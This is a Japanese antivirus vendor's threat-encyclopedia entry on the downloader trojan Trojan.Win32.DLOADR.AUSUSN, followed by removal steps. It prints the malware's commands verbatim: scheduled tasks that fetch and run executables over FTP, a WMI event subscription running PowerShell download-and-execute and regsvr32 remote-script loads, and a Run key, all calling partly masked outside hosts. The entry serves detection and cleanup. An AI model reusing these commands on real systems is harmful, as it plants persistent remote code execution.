Trojan.Win32.DLOADR.AUSUSN

2019年12月18日

更新者 : Arianne Grace Dela Cruz

別名:

Trojan.VBS.Starter.lr (KASPERSKY); Gen:Variant.Strictor.230978 (BITDEFENDER)

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい

概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 302,510 bytes

タイプ EXE

発見日 2019年11月28日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

"%System%\WScript.exe" "%Windows%\inf\n.vbs"
%Windows%\inf\n.vbs
"%Windows%\inf\c3.bat"
%Windows%\inf\c3.bat
net1 user mm123$ /del
net1 user admin$ /del
net1 user sysadm05 /del
net stop AnyDesk
sc config AnyDesk start= disabled
attrib -s -h -r %System Root%\Users\Default\AppData\Local\Temp\*.exe
attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe
attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\*.exe
attrib -s -h -r %System Root%\Users\{username}\AppData\Local\Temp\*.exe
attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe
attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\*.exe
attrib -s -h -r %User Temp%\*.exe
attrib -s -h -r %Application Data%\Tempo\*.exe
attrib -s -h -r %Application Data%\*.exe
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d everyone
cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d system
cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system
cacls "%System Root%\Program Files\autodesk\*.exe" /e /d everyone
cacls "%System Root%\Program Files\autodesk\*.exe" /e /d system
cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d everyone
cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d system
cacls "%Program Files%\RemoteDesk\*.exe" /e /d everyone
cacls "%Program Files%\RemoteDesk\*.exe" /e /d system
cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
cacls "%Program Files%\autodesk\*.exe" /e /d everyone
cacls "%Program Files%\autodesk\*.exe" /e /d system
cacls "%Program Files%\anydesk\*.exe" /e /d system
cacls "%Program Files%\anydesk\*.exe" /e /d everyone
cacls %Windows%\debug\WIA\*.exe /e /d everyone
cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d everyone
cacls %Application Data%\Tempo /e /d everyone
cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d system
cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
cacls %Application Data%\Tempo /e /d system
cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d system
cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d everyone
cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
cacls %System Root%\Users\{username}\AppData\Roaming\*.exe /e /g everyone:f
cacls %Application Data% /e /g everyone:f
cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g system:f
cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g everyone:f
cacls %User Temp% /e /g system:f
cacls %User Temp% /e /g everyone:f
cacls %System Root%\Users\Default\AppData\Local\Temp /e /g everyone:f
cacls %System Root%\Users\Default\AppData\Roaming /e /g everyone:f
cacls %System Root%\Users\Default\AppData\Roaming /e /g system:f
cacls %System Root%\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g system:f
cacls %System Root%\SysData\*.exe /e /d system
cacls %System Root%\Msupdate /e /d system
cacls %Windows%\xcecg /e /d system
cacls %Windows%\ccm /e /d system
cacls %Windows%\smss.exe /e /d system
cacls "%System Root%\Program Files\Common Files\Services\*.exe" /e /d system
cacls %System%\a.exe /e /d system
cacls %Windows%\security\*.exe /e /d system
cacls %Windows%\security\*.exe /e /d everyone
cacls %Windows%\Resources\*.exe /e /d system
cacls %Windows%\Resources\*.exe /e /d everyone
cacls %Windows%\Resources\Themes\*.exe /e /d system
cacls %Windows%\Resources\Themes\*.exe /e /d everyone
%System%\net1 stop AnyDesk
cacls %Windows%\system\lsmsm.exe /e /d system
cacls %All Users Profile%\homegroup\*.exe /e /d system
cacls %All Users Profile%\diskdata\*.exe /e /d system
cacls "%Program Files%\Microsoft Updates" /e /d system
cacls %System%\servwdrv.dll /e /d system
cacls %System%\servwdrv.dll /e /d everyone
cacls %System%\servwdrvx.dll /e /d system
cacls %System%\servwdrvx.dll /e /d everyone
cacls %System%\serwwdrv.dll /e /d system
cacls %System%\serwwdrv.dll /e /d everyone
cacls %Windows%\svchost.exe /e /d system
cacls %All Users Profile%\WmiAppSrv\svchost.exe /e /d system
cacls %Windows%\Help\taskhost.exe /e /d system
cacls %Windows%\Web\wininit.exe /e /d system
cacls %All Users Profile%\Microsoft\WmiAppSvr\csrss.exe /e /d system
cacls %Program Files%\Common Files\svshpst.exe /e /d system
cacls %Windows%\fonts\system32\svchost.exe /e /d system
cacls %Windows%\fonts\*.exe /e /d system
cacls %Windows%\Fonts\Microsoft /e /d system
cacls "%Windows%\Temp\32p.zip ª¦?¿ó¿¦¿¦í+???? 1\*.*" /e /d system
cacls "%Windows%\fonts\*.exe" /e /d system
cacls %Windows%\taskmgrs.exe /e /d system
cacls %Windows%\security\IIS\*.exe /e /d system
cacls %Program Files%\Common Files\System\*.exe /e /d system
cacls %Program Files%\dll\*.exe /e /d system
cacls %Windows%\Fonts\*.exe /e /d system
cacls %Program Files%\Common Files\Services\*.exe /e /d system
cacls %Program Files%\Common Files\SpeechEngines\*.exe /e /d system
cacls %Windows%\Fonts\system32\*.exe /e /d system
cacls %Windows%\SpeechsTracing\*.exe /e /d system
cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
cacLS %Program Files%\Common Files\Micros~1\*.exe /e /d system
cacls %System Root%\System\*.exe /e /d system
cacls %Windows%\1\*.exe /e /d system
cacls %Public%\*.exe /e /d system
cacls "%Program Files%\Common Files\conime.exe" /e /d system
cacls "%Program Files%\Common Files\conime.exe" /e /d system
cacls %Program Files%\test\*.exe /e /d everyone
cacls %Windows%\Fonts\help\*.exe /e /d system
cacls %Windows%\web\*.exe /e /d system
cacls %All Users Profile%\diskdata\*.exe /e /d system
cacls "%Program Files%\SQLWriter$\*.exe" /e /d system
cacls %Windows%\Prefetch\*.exe /e /d system
cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
cacls %Windows%\Fonts\Mysql\*.exe /e /d system
cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
cacls %Windows%\SysWOW64\drivers\taskmgr.exe /e /d system
cacls %Windows%\SysWOW64\drivers\svchost.exe /e /d system
cacls %Windows%\temp\svchost.exe /e /d system
cacls %Windows%\Fonts\Windows\*.exe /e /d system
cacls %System Root%\Msupdate /e /d system
cacls %Windows%\Fonts\Windows\*.exe /e /d system
cacls %All Users Profile%\Temp\*.exe /e /d system
cacls %Public%\Music\*.exe /e /d everyone
cacls %Public%\Music\*.vbs /e /d system
cacls %Windows%\Help\lsass.exe /e /d system
cacls %Windows%\temp\*.dll /e /d system
cacls %Windows%\debug\Nat\*.exe /e /d system
cacls %Windows%\Registration\*.exe /e /d system
cacls %Application Data%\Tempo\*.exe /e /d everyone
cacls "%Program Files%\Microsoft Blliasc\*.*" /e /d system
cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
cacls %Windows%\system\lsaus.exe /e /d system
cacls "%All Users Profile%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
cacls "%All Users Profile%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
cacls "%All Users Profile%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
cacls %All Users Profile%\Microsoft\HelpLibrary\*.dll /e /d system
cacls %Windows%\WBEM\ccproxy\*.exe /e /d system
cacls %All Users Profile%\Microsoft\Network\*.exe /e /d system
cacls %Windows%\system\lsmsm.exe /e /d system
cacls %Windows%\mysql.log /e /d system
%System%\cmd.exe /S /D /c" echo y"
%System%\cmd.exe /S /D /c" rd /s /q %Windows%\help\lsmosee.exe"
%System%\cmd.exe /S /D /c" echo y"
%System%\cmd.exe /S /D /c" rd /s /q %Windows%\debug\lsmosee.exe"
net start MSSQLSERVER
%System%\net1 start MSSQLSERVER
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa1" /tr "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe" /ru "system" /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
wmic process where "name='svchost.exe' and ExecutablePath<>'C:\WINDOWS\system32\svchost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\svchost.exe'" delete
wmic process where "name='wininit.exe' and ExecutablePath<>'C:\WINDOWS\system32\wininit.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\wininit.exe'" delete
wmic process where "name='csrss.exe' and ExecutablePath<>'C:\WINDOWS\system32\csrss.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\csrss.exe'" delete
wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\system32\WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\WUDFHosts.exe'" delete
wmic process where "name='services.exe' and ExecutablePath<>'C:\WINDOWS\system32\services.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\services.exe'" delete
wmic process where "name='taskhost.exe' and ExecutablePath<>'C:\WINDOWS\system32\taskhost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\taskhost.exe'" delete
wmic datafile where "Name='c:\windows\debug\lsmos.exe'" get Version /value
findstr "=1\.0\.0\.1$"
%System%\cmd.exe /c wmic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId|findstr "[0-9]"
mic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId
indstr "[0-9]"
SCHTASKS /Delete /TN "WindowsUpdate1" /F
SCHTASKS /Delete /TN "WindowsUpdate3" /F
SCHTASKS /Delete /TN "Windows_Update" /F
SCHTASKS /Delete /TN "Update" /F
SCHTASKS /Delete /TN "Update2" /F
SCHTASKS /Delete /TN "Update4" /F
SCHTASKS /Delete /TN "Update3" /F
SCHTASKS /Delete /TN "windowsinit" /F
SCHTASKS /Delete /TN "System Security Check" /F
SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
SCHTASKS /Delete /TN "updat_windows" /F
SCHTASKS /Delete /TN "at1" /F
SCHTASKS /Delete /TN "at2" /F
SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
netsh ipsec static delete policy name=win
netsh ipsec static delete filterlist name=Allowlist
netsh ipsec static delete filterlist name=denylist
netsh ipsec static delete filteraction name=allow
netsh advfirewall firewall delete rule name="tcp all" dir=in
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
netsh advfirewall firewall delete rule name="tcpall" dir=out
sc config MpsSvc start= auto
net start MpsSvc
%System%\net1 start MpsSvc
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
%System%\cmd.exe /S /D /c" ver "
find "5.1."
wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.{BLOCKED}e.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.162:8162/power.txt')||regsvr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.158.117:8117/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.{BLOCKED}e.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://{BLOCKED}.{BLOCKED}.155.170:8170/s.xsl\""
cmd /c start wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""

自動実行方法

マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

他のシステム変更

マルウェアは、以下のレジストリキーを追加します。

HKEY_CURRENT_USER\Software\WinRAR SFX

マルウェアは、以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Software\WinRAR SFX
C%%Windows%inf = "%Windows%\inf"

作成活動

マルウェアは、以下のファイルを作成します。

%Windows%\inf\c3.bat
%Windows%\inf\n.vbs
%Windows%\inf\_tmp_rar_sfx_access_check_3196273

(註：%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

その他

以下のスケジュールされたタスクを追加します：

Task Name: Mysa
Task Name: Mysa1
Task Name: Mysa2
Task Name: Mysa3
Task Name: ok

対応方法

対応検索エンジン: 9.850

初回 VSAPI パターンバージョン 15.526.04

初回 VSAPI パターンリリース日 2019年11月28日

VSAPI OPR パターンバージョン 15.527.00

VSAPI OPR パターンリリース日 2019年11月29日

手順 1

トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

TROJ.Win32.TRX.XXPE50FFF033E0002

手順 2

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 3

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 4

Windowsをセーフモードで再起動します。

[ 詳細 ]

セーフモードでの起動：

• Windows 2000 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows XP の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Server 2003 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Vista、Windows 7 および Windows Server 2008 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「詳細ブートオプション」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows 8、8.1 および Server 2012の場合：

画面の右上隅へマウスポインタを移動し、[チャーム]バーを表示します。
マウスで、[設定]－[PC設定の変更]を選択します。
左側のパネルで、[全般]を選択します。
右側のパネルで、[PCの起動をカスタマイズする]が表示されるまで下にスクロールし、[今すぐ再起動]をクリック。コンピュータが再起動するまで待ちます。
[オプションの選択]メニューで、[トラブルシューティング]－[詳細オプション]－[スタートアップ設定]－[再起動]をクリックします。
[スタートアップ設定]メニューで、[4]キーを押し、「4）セーフモードを有効にする」を選択します。

手順 5

不明なレジストリキーを削除します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_CURRENT_USER\Software
- WinRAR SFX

手順 6

このレジストリ値を削除します。

[ 詳細 ]

In HKEY_CURRENT_USER\Software\WinRAR SFX
- C%%Windows%inf = "%Windows%\inf"
In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

手順 7

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%Windows%\inf\c3.bat
%Windows%\inf\n.vbs
%Windows%\inf\_tmp_rar_sfx_access_check_3196273

手順 8

スケジュールされたタスクを削除する

タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

Task Name: Mysa
Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe"
Task Name: Mysa1
Task to be run: "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa"
Task Name: Mysa2
Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p"
Task Name: Mysa3
Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe"
Task Name: ok
Task to be run: "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa

Windows 2000、Windows XP、Windows Server 2003の場合：

[スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
上記の{タスク名} を、[名前]の欄に入力します。
入力した{タスク名} 持つファイルを右クリックします。
[プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
上記の{実行するタスク}と文字列が一致するタスクを削除します。

Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合：

Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
文字列が一致するタスクを削除します。

手順 9

コンピュータを通常モードで再起動し、最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、「Trojan.Win32.DLOADR.AUSUSN」と検出したファイルの検索を実行してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください

Trojan.Win32.DLOADR.AUSUSN

概要

詳細

対応方法

リソース

サポート

会社概要

東京本社

Trojan.Win32.DLOADR.AUSUSN

概要

詳細

対応方法

リソース

サポート

会社概要

東京本社

The Americas

Asia Pacific

Europe, Middle East & Africa